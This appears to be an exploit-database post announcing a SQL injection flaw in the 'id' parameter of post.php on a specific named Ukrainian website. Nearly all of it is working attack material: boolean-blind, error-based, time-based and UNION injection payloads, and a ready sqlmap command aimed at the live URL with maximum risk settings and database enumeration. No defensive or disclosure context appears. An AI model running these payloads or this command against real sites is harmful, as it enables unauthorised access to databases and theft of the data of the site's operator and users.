############################################################################## # Exploit Title : DOROJNIK SQL INJECTION Vulnerability # Author : AtakBey,Secret Team # Date : 15/09/2019 # Vendor Homepage : dorojnik.zp.ua # Tested On : Windows # Category : WebApps # Exploit Risk : Medium ############################################################################## # Exploit : /post.php?id=[SQL Injection] # Payload : Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=865' AND 2314=2314-- ftaA Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) Payload: id=865' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a6271,(SELECT (ELT(2349=2349,1))),0x71716a6271,0x78))s), 8446744073709551610, 8446744073709551610)))-- oVlT Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=865' AND SLEEP(5)-- dBrG Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: id=-4164' UNION ALL SELECT NULL,NULL,CONCAT(0x71786a6271,0x6f55437169444248536f66724f6241655a52506a775649436f68414454796d545641796566647a45,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YytL # SQLMAP Config sqlmap.py -u "http://dorojnik.zp.ua/post.php?id=865" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs ############################################################################## # Thanks : Atakbey,Secretteam.biz